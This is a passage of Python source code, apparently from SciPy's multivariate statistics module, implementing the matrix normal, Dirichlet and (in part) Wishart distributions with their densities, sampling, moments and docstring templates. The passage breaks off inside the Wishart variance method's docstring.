"""
Computes the differential entropy of the multivariate normal.
Returns
-------
h : scalar
Entropy of the multivariate normal distribution
"""
log_pdet = self.cov_info.log_pdet
rank = self.cov_info.rank
return 0.5 * (rank * (_LOG_2PI + 1) + log_pdet)
# Set frozen generator docstrings from corresponding docstrings in
# multivariate_normal_gen and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'rvs']:
method = multivariate_normal_gen.__dict__[name]
method_frozen = multivariate_normal_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(method.__doc__, mvn_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, mvn_docdict_params)
_matnorm_doc_default_callparams = """\
mean : array_like, optional
Mean of the distribution (default: `None`)
rowcov : array_like, optional
Among-row covariance matrix of the distribution (default: `1`)
colcov : array_like, optional
Among-column covariance matrix of the distribution (default: `1`)
"""
_matnorm_doc_callparams_note = \
"""If `mean` is set to `None` then a matrix of zeros is used for the mean.
The dimensions of this matrix are inferred from the shape of `rowcov` and
`colcov`, if these are provided, or set to `1` if ambiguous.
`rowcov` and `colcov` can be two-dimensional array_likes specifying the
covariance matrices directly. Alternatively, a one-dimensional array will
be interpreted as the entries of a diagonal matrix, and a scalar or
zero-dimensional array will be interpreted as this value times the
identity matrix.
"""
_matnorm_doc_frozen_callparams = ""
_matnorm_doc_frozen_callparams_note = \
"""See class definition for a detailed description of parameters."""
matnorm_docdict_params = {
'_matnorm_doc_default_callparams': _matnorm_doc_default_callparams,
'_matnorm_doc_callparams_note': _matnorm_doc_callparams_note,
'_doc_random_state': _doc_random_state
}
matnorm_docdict_noparams = {
'_matnorm_doc_default_callparams': _matnorm_doc_frozen_callparams,
'_matnorm_doc_callparams_note': _matnorm_doc_frozen_callparams_note,
'_doc_random_state': _doc_random_state
}
class matrix_normal_gen(multi_rv_generic):
r"""
A matrix normal random variable.
The `mean` keyword specifies the mean. The `rowcov` keyword specifies the
among-row covariance matrix. The `colcov` keyword specifies the
among-column covariance matrix.
Methods
-------
``pdf(X, mean=None, rowcov=1, colcov=1)``
Probability density function.
``logpdf(X, mean=None, rowcov=1, colcov=1)``
Log of the probability density function.
``rvs(mean=None, rowcov=1, colcov=1, size=1, random_state=None)``
Draw random samples.
Parameters
----------
X : array_like
Quantiles, with the last two axes of `X` denoting the components.
%(_matnorm_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix the mean
and covariance parameters, returning a "frozen" matrix normal
random variable:
rv = matrix_normal(mean=None, rowcov=1, colcov=1)
- Frozen object with the same methods but holding the given
mean and covariance fixed.
Notes
-----
%(_matnorm_doc_callparams_note)s
The covariance matrices specified by `rowcov` and `colcov` must be
(symmetric) positive definite. If the samples in `X` are
:math:`m \times n`, then `rowcov` must be :math:`m \times m` and
`colcov` must be :math:`n \times n`. `mean` must be the same shape as `X`.
The probability density function for `matrix_normal` is
.. math::
f(X) = (2 \pi)^{-\frac{mn}{2}}|U|^{-\frac{n}{2}} |V|^{-\frac{m}{2}}
\exp\left( -\frac{1}{2} \mathrm{Tr}\left[ U^{-1} (X-M) V^{-1}
(X-M)^T \right] \right),
where :math:`M` is the mean, :math:`U` the among-row covariance matrix,
:math:`V` the among-column covariance matrix.
The `allow_singular` behaviour of the `multivariate_normal`
distribution is not currently supported. Covariance matrices must be
full rank.
The `matrix_normal` distribution is closely related to the
`multivariate_normal` distribution. Specifically, :math:`\mathrm{Vec}(X)`
(the vector formed by concatenating the columns of :math:`X`) has a
multivariate normal distribution with mean :math:`\mathrm{Vec}(M)`
and covariance :math:`V \otimes U` (where :math:`\otimes` is the Kronecker
product). Sampling and pdf evaluation are
:math:`\mathcal{O}(m^3 + n^3 + m^2 n + m n^2)` for the matrix normal, but
:math:`\mathcal{O}(m^3 n^3)` for the equivalent multivariate normal,
making this equivalent form algorithmically inefficient.
.. versionadded:: 0.17.0
Examples
--------
>>> from scipy.stats import matrix_normal
>>> M = np.arange(6).reshape(3,2); M
array([[0, 1],
[2, 3],
[4, 5]])
>>> U = np.diag([1,2,3]); U
array([[1, 0, 0],
[0, 2, 0],
[0, 0, 3]])
>>> V = 0.3*np.identity(2); V
array([[ 0.3, 0. ],
[ 0. , 0.3]])
>>> X = M + 0.1; X
array([[ 0.1, 1.1],
[ 2.1, 3.1],
[ 4.1, 5.1]])
>>> matrix_normal.pdf(X, mean=M, rowcov=U, colcov=V)
0.023410202050005054
>>> # Equivalent multivariate normal
>>> from scipy.stats import multivariate_normal
>>> vectorised_X = X.T.flatten()
>>> equiv_mean = M.T.flatten()
>>> equiv_cov = np.kron(V,U)
>>> multivariate_normal.pdf(vectorised_X, mean=equiv_mean, cov=equiv_cov)
0.023410202050005054
"""
def __init__(self, seed=None):
super(matrix_normal_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, matnorm_docdict_params)
def __call__(self, mean=None, rowcov=1, colcov=1, seed=None):
"""
Create a frozen matrix normal distribution.
See `matrix_normal_frozen` for more information.
"""
return matrix_normal_frozen(mean, rowcov, colcov, seed=seed)
def _process_parameters(self, mean, rowcov, colcov):
"""
Infer dimensionality from mean or covariance matrices. Handle
defaults. Ensure compatible dimensions.
"""
# Process mean
if mean is not None:
mean = np.asarray(mean, dtype=float)
meanshape = mean.shape
if len(meanshape) != 2:
raise ValueError("Array `mean` must be two dimensional.")
if np.any(meanshape == 0):
raise ValueError("Array `mean` has invalid shape.")
# Process among-row covariance
rowcov = np.asarray(rowcov, dtype=float)
if rowcov.ndim == 0:
if mean is not None:
rowcov = rowcov * np.identity(meanshape[0])
else:
rowcov = rowcov * np.identity(1)
elif rowcov.ndim == 1:
rowcov = np.diag(rowcov)
rowshape = rowcov.shape
if len(rowshape) != 2:
raise ValueError("`rowcov` must be a scalar or a 2D array.")
if rowshape[0] != rowshape[1]:
raise ValueError("Array `rowcov` must be square.")
if rowshape[0] == 0:
raise ValueError("Array `rowcov` has invalid shape.")
numrows = rowshape[0]
# Process among-column covariance
colcov = np.asarray(colcov, dtype=float)
if colcov.ndim == 0:
if mean is not None:
colcov = colcov * np.identity(meanshape[1])
else:
colcov = colcov * np.identity(1)
elif colcov.ndim == 1:
colcov = np.diag(colcov)
colshape = colcov.shape
if len(colshape) != 2:
raise ValueError("`colcov` must be a scalar or a 2D array.")
if colshape[0] != colshape[1]:
raise ValueError("Array `colcov` must be square.")
if colshape[0] == 0:
raise ValueError("Array `colcov` has invalid shape.")
numcols = colshape[0]
# Ensure mean and covariances compatible
if mean is not None:
if meanshape[0] != numrows:
raise ValueError("Arrays `mean` and `rowcov` must have the"
"same number of rows.")
if meanshape[1] != numcols:
raise ValueError("Arrays `mean` and `colcov` must have the"
"same number of columns.")
else:
mean = np.zeros((numrows,numcols))
dims = (numrows, numcols)
return dims, mean, rowcov, colcov
def _process_quantiles(self, X, dims):
"""
Adjust quantiles array so that last two axes labels the components of
each data point.
"""
X = np.asarray(X, dtype=float)
if X.ndim == 2:
X = X[np.newaxis, :]
if X.shape[-2:] != dims:
raise ValueError("The shape of array `X` is not compatible "
"with the distribution parameters.")
return X
def _logpdf(self, dims, X, mean, row_prec_rt, log_det_rowcov,
col_prec_rt, log_det_colcov):
"""
Parameters
----------
dims : tuple
Dimensions of the matrix variates
X : ndarray
Points at which to evaluate the log of the probability
density function
mean : ndarray
Mean of the distribution
row_prec_rt : ndarray
A decomposition such that np.dot(row_prec_rt, row_prec_rt.T)
is the inverse of the among-row covariance matrix
log_det_rowcov : float
Logarithm of the determinant of the among-row covariance matrix
col_prec_rt : ndarray
A decomposition such that np.dot(col_prec_rt, col_prec_rt.T)
is the inverse of the among-column covariance matrix
log_det_colcov : float
Logarithm of the determinant of the among-column covariance matrix
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
numrows, numcols = dims
roll_dev = np.rollaxis(X-mean, axis=-1, start=0)
scale_dev = np.tensordot(col_prec_rt.T,
np.dot(roll_dev, row_prec_rt), 1)
maha = np.sum(np.sum(np.square(scale_dev), axis=-1), axis=0)
return -0.5 * (numrows*numcols*_LOG_2PI + numcols*log_det_rowcov
+ numrows*log_det_colcov + maha)
def logpdf(self, X, mean=None, rowcov=1, colcov=1):
"""
Log of the matrix normal probability density function.
Parameters
----------
X : array_like
Quantiles, with the last two axes of `X` denoting the components.
%(_matnorm_doc_default_callparams)s
Returns
-------
logpdf : ndarray
Log of the probability density function evaluated at `X`
Notes
-----
%(_matnorm_doc_callparams_note)s
"""
dims, mean, rowcov, colcov = self._process_parameters(mean, rowcov,
colcov)
X = self._process_quantiles(X, dims)
rowpsd = _PSD(rowcov, allow_singular=False)
colpsd = _PSD(colcov, allow_singular=False)
out = self._logpdf(dims, X, mean, rowpsd.U, rowpsd.log_pdet, colpsd.U,
colpsd.log_pdet)
return _squeeze_output(out)
def pdf(self, X, mean=None, rowcov=1, colcov=1):
"""
Matrix normal probability density function.
Parameters
----------
X : array_like
Quantiles, with the last two axes of `X` denoting the components.
%(_matnorm_doc_default_callparams)s
Returns
-------
pdf : ndarray
Probability density function evaluated at `X`
Notes
-----
%(_matnorm_doc_callparams_note)s
"""
return np.exp(self.logpdf(X, mean, rowcov, colcov))
def rvs(self, mean=None, rowcov=1, colcov=1, size=1, random_state=None):
"""
Draw random samples from a matrix normal distribution.
Parameters
----------
%(_matnorm_doc_default_callparams)s
size : integer, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray or scalar
Random variates of size (`size`, `dims`), where `dims` is the
dimension of the random matrices.
Notes
-----
%(_matnorm_doc_callparams_note)s
"""
size = int(size)
dims, mean, rowcov, colcov = self._process_parameters(mean, rowcov,
colcov)
rowchol = scipy.linalg.cholesky(rowcov, lower=True)
colchol = scipy.linalg.cholesky(colcov, lower=True)
random_state = self._get_random_state(random_state)
std_norm = random_state.standard_normal(size=(dims[1],size,dims[0]))
roll_rvs = np.tensordot(colchol, np.dot(std_norm, rowchol.T), 1)
out = np.rollaxis(roll_rvs.T, axis=1, start=0) + mean[np.newaxis,:,:]
if size == 1:
#out = np.squeeze(out, axis=0)
out = out.reshape(mean.shape)
return out
matrix_normal = matrix_normal_gen()
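# Illustrative sketch (hypothetical helper): a single matrix normal draw can
# be built directly as M + L_r Z L_c^T, where L_r and L_c are the lower
# Cholesky factors of `rowcov` and `colcov` and Z is an i.i.d. standard normal
# matrix of the same shape as M.  This is the construction that
# `matrix_normal_gen.rvs` vectorises over `size`; it assumes `rowcov` and
# `colcov` are given as full 2-D symmetric positive definite matrices.
def _demo_matrix_normal_draw(mean, rowcov, colcov, random_state=None):
    """Draw one matrix normal variate via an explicit Cholesky transform (illustrative)."""
    random_state = check_random_state(random_state)
    mean = np.asarray(mean, dtype=float)
    L_r = scipy.linalg.cholesky(np.asarray(rowcov, dtype=float), lower=True)
    L_c = scipy.linalg.cholesky(np.asarray(colcov, dtype=float), lower=True)
    Z = random_state.standard_normal(mean.shape)
    return mean + np.dot(L_r, np.dot(Z, L_c.T))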
class matrix_normal_frozen(multi_rv_frozen):
def __init__(self, mean=None, rowcov=1, colcov=1, seed=None):
"""
Create a frozen matrix normal distribution.
Parameters
----------
%(_matnorm_doc_default_callparams)s
seed : None or int or np.random.RandomState instance, optional
If int or RandomState, use it for drawing the random variates.
If None (or np.random), the global np.random state is used.
Default is None.
Examples
--------
>>> from scipy.stats import matrix_normal
>>> distn = matrix_normal(mean=np.zeros((3,3)))
>>> X = distn.rvs(); X
array([[-0.02976962, 0.93339138, -0.09663178],
[ 0.67405524, 0.28250467, -0.93308929],
[-0.31144782, 0.74535536, 1.30412916]])
>>> distn.pdf(X)
2.5160642368346784e-05
>>> distn.logpdf(X)
-10.590229595124615
"""
self._dist = matrix_normal_gen(seed)
self.dims, self.mean, self.rowcov, self.colcov = \
self._dist._process_parameters(mean, rowcov, colcov)
self.rowpsd = _PSD(self.rowcov, allow_singular=False)
self.colpsd = _PSD(self.colcov, allow_singular=False)
def logpdf(self, X):
X = self._dist._process_quantiles(X, self.dims)
out = self._dist._logpdf(self.dims, X, self.mean, self.rowpsd.U,
self.rowpsd.log_pdet, self.colpsd.U,
self.colpsd.log_pdet)
return _squeeze_output(out)
def pdf(self, X):
return np.exp(self.logpdf(X))
def rvs(self, size=1, random_state=None):
return self._dist.rvs(self.mean, self.rowcov, self.colcov, size,
random_state)
# Set frozen generator docstrings from corresponding docstrings in
# matrix_normal_gen and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'rvs']:
method = matrix_normal_gen.__dict__[name]
method_frozen = matrix_normal_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(method.__doc__, matnorm_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, matnorm_docdict_params)
_dirichlet_doc_default_callparams = """\
alpha : array_like
The concentration parameters. The number of entries determines the
dimensionality of the distribution.
"""
_dirichlet_doc_frozen_callparams = ""
_dirichlet_doc_frozen_callparams_note = \
"""See class definition for a detailed description of parameters."""
dirichlet_docdict_params = {
'_dirichlet_doc_default_callparams': _dirichlet_doc_default_callparams,
'_doc_random_state': _doc_random_state
}
dirichlet_docdict_noparams = {
'_dirichlet_doc_default_callparams': _dirichlet_doc_frozen_callparams,
'_doc_random_state': _doc_random_state
}
def _dirichlet_check_parameters(alpha):
alpha = np.asarray(alpha)
if np.min(alpha) <= 0:
raise ValueError("All parameters must be greater than 0")
elif alpha.ndim != 1:
raise ValueError("Parameter vector 'a' must be one dimensional, "
"but a.shape = %s." % (alpha.shape, ))
return alpha
def _dirichlet_check_input(alpha, x):
x = np.asarray(x)
if x.shape[0] + 1 != alpha.shape[0] and x.shape[0] != alpha.shape[0]:
raise ValueError("Vector 'x' must have either the same number "
"of entries as, or one entry fewer than, "
"parameter vector 'a', but alpha.shape = %s "
"and x.shape = %s." % (alpha.shape, x.shape))
if x.shape[0] != alpha.shape[0]:
xk = np.array([1 - np.sum(x, 0)])
if xk.ndim == 1:
x = np.append(x, xk)
elif xk.ndim == 2:
x = np.vstack((x, xk))
else:
raise ValueError("The input must be one dimensional or a two "
"dimensional matrix containing the entries.")
if np.min(x) <= 0:
raise ValueError("Each entry in 'x' must be greater than zero.")
if np.max(x) > 1:
raise ValueError("Each entry in 'x' must be smaller or equal one.")
if (np.abs(np.sum(x, 0) - 1.0) > 10e-10).any():
raise ValueError("The input vector 'x' must lie within the normal "
"simplex. but np.sum(x, 0) = %s." % np.sum(x, 0))
return x
def _lnB(alpha):
r"""
Internal helper function to compute the log of the useful quotient
.. math::
B(\alpha) = \frac{\prod_{i=1}^{K}\Gamma(\alpha_i)}{\Gamma\left(\sum_{i=1}^{K}\alpha_i\right)}
Parameters
----------
%(_dirichlet_doc_default_callparams)s
Returns
-------
B : scalar
Helper quotient, internal use only
"""
return np.sum(gammaln(alpha)) - gammaln(np.sum(alpha))
class dirichlet_gen(multi_rv_generic):
r"""
A Dirichlet random variable.
The `alpha` keyword specifies the concentration parameters of the
distribution.
.. versionadded:: 0.15.0
Methods
-------
``pdf(x, alpha)``
Probability density function.
``logpdf(x, alpha)``
Log of the probability density function.
``rvs(alpha, size=1, random_state=None)``
Draw random samples from a Dirichlet distribution.
``mean(alpha)``
The mean of the Dirichlet distribution
``var(alpha)``
The variance of the Dirichlet distribution
``entropy(alpha)``
Compute the differential entropy of the Dirichlet distribution.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_dirichlet_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix
concentration parameters, returning a "frozen" Dirichlet
random variable:
rv = dirichlet(alpha)
- Frozen object with the same methods but holding the given
concentration parameters fixed.
Notes
-----
Each :math:`\alpha` entry must be positive. The distribution has support
only on the simplex defined by
.. math::
\sum_{i=1}^{K} x_i \le 1
The probability density function for `dirichlet` is
.. math::
f(x) = \frac{1}{\mathrm{B}(\boldsymbol\alpha)} \prod_{i=1}^K x_i^{\alpha_i - 1}
where
.. math::
\mathrm{B}(\boldsymbol\alpha) = \frac{\prod_{i=1}^K \Gamma(\alpha_i)}
{\Gamma\bigl(\sum_{i=1}^K \alpha_i\bigr)}
and :math:`\boldsymbol\alpha=(\alpha_1,\ldots,\alpha_K)`, the
concentration parameters and :math:`K` is the dimension of the space
where :math:`x` takes values.
Note that the dirichlet interface is somewhat inconsistent.
The array returned by the rvs function is transposed
with respect to the format expected by the pdf and logpdf.
"""
def __init__(self, seed=None):
super(dirichlet_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, dirichlet_docdict_params)
def __call__(self, alpha, seed=None):
return dirichlet_frozen(alpha, seed=seed)
def _logpdf(self, x, alpha):
"""
Parameters
----------
x : ndarray
Points at which to evaluate the log of the probability
density function
%(_dirichlet_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
lnB = _lnB(alpha)
return - lnB + np.sum((np.log(x.T) * (alpha - 1)).T, 0)
def logpdf(self, x, alpha):
"""
Log of the Dirichlet probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_dirichlet_doc_default_callparams)s
Returns
-------
pdf : ndarray
Log of the probability density function evaluated at `x`.
"""
alpha = _dirichlet_check_parameters(alpha)
x = _dirichlet_check_input(alpha, x)
out = self._logpdf(x, alpha)
return _squeeze_output(out)
def pdf(self, x, alpha):
"""
The Dirichlet probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_dirichlet_doc_default_callparams)s
Returns
-------
pdf : ndarray
The probability density function evaluated at `x`.
"""
alpha = _dirichlet_check_parameters(alpha)
x = _dirichlet_check_input(alpha, x)
out = np.exp(self._logpdf(x, alpha))
return _squeeze_output(out)
def mean(self, alpha):
"""
Compute the mean of the Dirichlet distribution.
Parameters
----------
%(_dirichlet_doc_default_callparams)s
Returns
-------
mu : ndarray
Mean of the Dirichlet distribution
"""
alpha = _dirichlet_check_parameters(alpha)
out = alpha / (np.sum(alpha))
return _squeeze_output(out)
def var(self, alpha):
"""
Compute the variance of the Dirichlet distribution.
Parameters
----------
%(_dirichlet_doc_default_callparams)s
Returns
-------
v : ndarray
Variance of the Dirichlet distribution
"""
alpha = _dirichlet_check_parameters(alpha)
alpha0 = np.sum(alpha)
out = (alpha * (alpha0 - alpha)) / ((alpha0 * alpha0) * (alpha0 + 1))
return out
def entropy(self, alpha):
"""
Compute the differential entropy of the Dirichlet distribution.
Parameters
----------
%(_dirichlet_doc_default_callparams)s
Returns
-------
h : scalar
Entropy of the Dirichlet distribution
"""
alpha = _dirichlet_check_parameters(alpha)
alpha0 = np.sum(alpha)
lnB = _lnB(alpha)
K = alpha.shape[0]
out = lnB + (alpha0 - K) * psi(alpha0) - np.sum(
(alpha - 1) * psi(alpha))
return _squeeze_output(out)
def rvs(self, alpha, size=1, random_state=None):
"""
Draw random samples from a Dirichlet distribution.
Parameters
----------
%(_dirichlet_doc_default_callparams)s
size : int, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray or scalar
Random variates of size (`size`, `N`), where `N` is the
dimension of the random variable.
"""
alpha = _dirichlet_check_parameters(alpha)
random_state = self._get_random_state(random_state)
return random_state.dirichlet(alpha, size=size)
dirichlet = dirichlet_gen()
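# Illustrative sketch (hypothetical helper): as noted in the class docstring,
# `dirichlet.rvs` returns samples of shape (size, K) while `pdf`/`logpdf`
# expect the K components along the first axis, so the draws must be
# transposed before their densities can be evaluated.
def _demo_dirichlet_rvs_pdf(alpha, size=5, random_state=None):
    """Draw Dirichlet samples and evaluate their densities (illustrative)."""
    draws = dirichlet.rvs(alpha, size=size, random_state=random_state)
    # draws has shape (size, K); pdf expects shape (K, size).
    return dirichlet.pdf(draws.T, alpha)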
class dirichlet_frozen(multi_rv_frozen):
def __init__(self, alpha, seed=None):
self.alpha = _dirichlet_check_parameters(alpha)
self._dist = dirichlet_gen(seed)
def logpdf(self, x):
return self._dist.logpdf(x, self.alpha)
def pdf(self, x):
return self._dist.pdf(x, self.alpha)
def mean(self):
return self._dist.mean(self.alpha)
def var(self):
return self._dist.var(self.alpha)
def entropy(self):
return self._dist.entropy(self.alpha)
def rvs(self, size=1, random_state=None):
return self._dist.rvs(self.alpha, size, random_state)
# Set frozen generator docstrings from corresponding docstrings in
# multivariate_normal_gen and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'rvs', 'mean', 'var', 'entropy']:
method = dirichlet_gen.__dict__[name]
method_frozen = dirichlet_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(
method.__doc__, dirichlet_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, dirichlet_docdict_params)
_wishart_doc_default_callparams = """\
df : int
Degrees of freedom, must be greater than or equal to dimension of the
scale matrix
scale : array_like
Symmetric positive definite scale matrix of the distribution
"""
_wishart_doc_callparams_note = ""
_wishart_doc_frozen_callparams = ""
_wishart_doc_frozen_callparams_note = \
"""See class definition for a detailed description of parameters."""
wishart_docdict_params = {
'_doc_default_callparams': _wishart_doc_default_callparams,
'_doc_callparams_note': _wishart_doc_callparams_note,
'_doc_random_state': _doc_random_state
}
wishart_docdict_noparams = {
'_doc_default_callparams': _wishart_doc_frozen_callparams,
'_doc_callparams_note': _wishart_doc_frozen_callparams_note,
'_doc_random_state': _doc_random_state
}
class wishart_gen(multi_rv_generic):
r"""
A Wishart random variable.
The `df` keyword specifies the degrees of freedom. The `scale` keyword
specifies the scale matrix, which must be symmetric and positive definite.
In this context, the scale matrix is often interpreted in terms of a
multivariate normal precision matrix (the inverse of the covariance
matrix).
Methods
-------
``pdf(x, df, scale)``
Probability density function.
``logpdf(x, df, scale)``
Log of the probability density function.
``rvs(df, scale, size=1, random_state=None)``
Draw random samples from a Wishart distribution.
``entropy()``
Compute the differential entropy of the Wishart distribution.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix the degrees
of freedom and scale parameters, returning a "frozen" Wishart random
variable:
rv = wishart(df=1, scale=1)
- Frozen object with the same methods but holding the given
degrees of freedom and scale fixed.
See Also
--------
invwishart, chi2
Notes
-----
%(_doc_callparams_note)s
The scale matrix `scale` must be a symmetric positive definite
matrix. Singular matrices, including the symmetric positive semi-definite
case, are not supported.
The Wishart distribution is often denoted
.. math::
W_p(\nu, \Sigma)
where :math:`\nu` is the degrees of freedom and :math:`\Sigma` is the
:math:`p \times p` scale matrix.
The probability density function for `wishart` has support over positive
definite matrices :math:`S`; if :math:`S \sim W_p(\nu, \Sigma)`, then
its PDF is given by:
.. math::
f(S) = \frac{|S|^{\frac{\nu - p - 1}{2}}}{2^{ \frac{\nu p}{2} }
|\Sigma|^\frac{\nu}{2} \Gamma_p \left ( \frac{\nu}{2} \right )}
\exp\left( -tr(\Sigma^{-1} S) / 2 \right)
If :math:`S \sim W_p(\nu, \Sigma)` (Wishart) then
:math:`S^{-1} \sim W_p^{-1}(\nu, \Sigma^{-1})` (inverse Wishart).
If the scale matrix is 1-dimensional and equal to one, then the Wishart
distribution :math:`W_1(\nu, 1)` collapses to the :math:`\chi^2(\nu)`
distribution.
.. versionadded:: 0.16.0
References
----------
.. [1] M.L. Eaton, "Multivariate Statistics: A Vector Space Approach",
Wiley, 1983.
.. [2] W.B. Smith and R.R. Hocking, "Algorithm AS 53: Wishart Variate
Generator", Applied Statistics, vol. 21, pp. 341-345, 1972.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy.stats import wishart, chi2
>>> x = np.linspace(1e-5, 8, 100)
>>> w = wishart.pdf(x, df=3, scale=1); w[:5]
array([ 0.00126156, 0.10892176, 0.14793434, 0.17400548, 0.1929669 ])
>>> c = chi2.pdf(x, 3); c[:5]
array([ 0.00126156, 0.10892176, 0.14793434, 0.17400548, 0.1929669 ])
>>> plt.plot(x, w)
The input quantiles can be any shape of array, as long as the last
axis labels the components.
"""
def __init__(self, seed=None):
super(wishart_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, wishart_docdict_params)
def __call__(self, df=None, scale=None, seed=None):
"""
Create a frozen Wishart distribution.
See `wishart_frozen` for more information.
"""
return wishart_frozen(df, scale, seed)
def _process_parameters(self, df, scale):
if scale is None:
scale = 1.0
scale = np.asarray(scale, dtype=float)
if scale.ndim == 0:
scale = scale[np.newaxis,np.newaxis]
elif scale.ndim == 1:
scale = np.diag(scale)
elif scale.ndim == 2 and not scale.shape[0] == scale.shape[1]:
raise ValueError("Array 'scale' must be square if it is two"
" dimensional, but scale.scale = %s."
% str(scale.shape))
elif scale.ndim > 2:
raise ValueError("Array 'scale' must be at most two-dimensional,"
" but scale.ndim = %d" % scale.ndim)
dim = scale.shape[0]
if df is None:
df = dim
elif not np.isscalar(df):
raise ValueError("Degrees of freedom must be a scalar.")
elif df < dim:
raise ValueError("Degrees of freedom cannot be less than dimension"
" of scale matrix, but df = %d" % df)
return dim, df, scale
def _process_quantiles(self, x, dim):
"""
Adjust quantiles array so that last axis labels the components of
each data point.
"""
x = np.asarray(x, dtype=float)
if x.ndim == 0:
x = x * np.eye(dim)[:, :, np.newaxis]
if x.ndim == 1:
if dim == 1:
x = x[np.newaxis, np.newaxis, :]
else:
x = np.diag(x)[:, :, np.newaxis]
elif x.ndim == 2:
if not x.shape[0] == x.shape[1]:
raise ValueError("Quantiles must be square if they are two"
" dimensional, but x.shape = %s."
% str(x.shape))
x = x[:, :, np.newaxis]
elif x.ndim == 3:
if not x.shape[0] == x.shape[1]:
raise ValueError("Quantiles must be square in the first two"
" dimensions if they are three dimensional"
", but x.shape = %s." % str(x.shape))
elif x.ndim > 3:
raise ValueError("Quantiles must be at most two-dimensional with"
" an additional dimension for multiple"
"components, but x.ndim = %d" % x.ndim)
# Now we have 3-dim array; should have shape [dim, dim, *]
if not x.shape[0:2] == (dim, dim):
raise ValueError('Quantiles have incompatible dimensions: should'
' be %s, got %s.' % ((dim, dim), x.shape[0:2]))
return x
def _process_size(self, size):
size = np.asarray(size)
if size.ndim == 0:
size = size[np.newaxis]
elif size.ndim > 1:
raise ValueError('Size must be an integer or tuple of integers;'
' thus must have dimension <= 1.'
' Got size.ndim = %d' % size.ndim)
n = size.prod()
shape = tuple(size)
return n, shape
def _logpdf(self, x, dim, df, scale, log_det_scale, C):
"""
Parameters
----------
x : ndarray
Points at which to evaluate the log of the probability
density function
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
scale : ndarray
Scale matrix
log_det_scale : float
Logarithm of the determinant of the scale matrix
C : ndarray
Cholesky factorization of the scale matrix, lower triangular.
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
# Log determinant of x.
# Note: x has components along the last axis, so that x.T has
# components along the 0-th axis. Then, since det(A) = det(A'), this
# gives us a 1-dim vector of determinants.
# Also retrieve tr(scale^{-1} x) for each component.
log_det_x = np.zeros(x.shape[-1])
scale_inv_x = np.zeros(x.shape)
tr_scale_inv_x = np.zeros(x.shape[-1])
for i in range(x.shape[-1]):
_, log_det_x[i] = self._cholesky_logdet(x[:,:,i])
scale_inv_x[:,:,i] = scipy.linalg.cho_solve((C, True), x[:,:,i])
tr_scale_inv_x[i] = scale_inv_x[:,:,i].trace()
# Log PDF
out = ((0.5 * (df - dim - 1) * log_det_x - 0.5 * tr_scale_inv_x) -
(0.5 * df * dim * _LOG_2 + 0.5 * df * log_det_scale +
multigammaln(0.5*df, dim)))
return out
def logpdf(self, x, df, scale):
"""
Log of the Wishart probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
Each quantile must be a symmetric positive definite matrix.
%(_doc_default_callparams)s
Returns
-------
pdf : ndarray
Log of the probability density function evaluated at `x`
Notes
-----
%(_doc_callparams_note)s
"""
dim, df, scale = self._process_parameters(df, scale)
x = self._process_quantiles(x, dim)
# Cholesky decomposition of scale, get log(det(scale))
C, log_det_scale = self._cholesky_logdet(scale)
out = self._logpdf(x, dim, df, scale, log_det_scale, C)
return _squeeze_output(out)
def pdf(self, x, df, scale):
"""
Wishart probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
Each quantile must be a symmetric positive definite matrix.
%(_doc_default_callparams)s
Returns
-------
pdf : ndarray
Probability density function evaluated at `x`
Notes
-----
%(_doc_callparams_note)s
"""
return np.exp(self.logpdf(x, df, scale))
def _mean(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'mean' instead.
"""
return df * scale
def mean(self, df, scale):
"""
Mean of the Wishart distribution
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
mean : float
The mean of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._mean(dim, df, scale)
return _squeeze_output(out)
def _mode(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'mode' instead.
"""
if df >= dim + 1:
out = (df-dim-1) * scale
else:
out = None
return out
def mode(self, df, scale):
"""
Mode of the Wishart distribution
Only valid if the degrees of freedom are greater than the dimension of
the scale matrix.
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
mode : float or None
The mode of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._mode(dim, df, scale)
return _squeeze_output(out) if out is not None else out
def _var(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'var' instead.
"""
var = scale**2
diag = scale.diagonal() # 1 x dim array
var += np.outer(diag, diag)
var *= df
return var
def var(self, df, scale):
"""
Variance of the Wishart distribution
Parameters
----------
%(_doc_default_callparams)s
